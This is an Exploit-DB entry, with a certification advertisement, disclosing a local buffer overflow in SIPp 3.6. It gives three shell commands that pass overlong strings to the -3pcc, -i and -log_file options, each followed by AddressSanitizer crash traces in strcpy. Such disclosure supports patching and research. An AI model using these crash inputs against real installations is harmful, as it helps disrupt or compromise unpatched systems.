SIPp 3.6 - Local Buffer Overflow (PoC)

EDB-ID:

44962

CVE:

N/A




Platform:

Linux

Date:

2018-07-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

# Exploit Title: SIPp 3.6 - Local Buffer Overflow (PoC)
# Date: 2018-06-30
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: http://sipp.sourceforge.net/ 
# Software Link: https://github.com/SIPp/sipp/releases 
# Version: 3.6-dev and earlier
# Tested on: 3.6-dev

$ ./sipp -3pcc `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x668d06 in main /home/user/sipp/src/sipp.cpp:1531:17
#2 0x7ff5ec21282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

$ ./sipp -i `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66a303 in main /home/user/sipp/src/sipp.cpp:1477:17
#2 0x7f281302682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

$ ./sipp -log_file `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66912f in main /home/user/sipp/src/sipp.cpp:1706:17
#2 0x7f6ca663782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)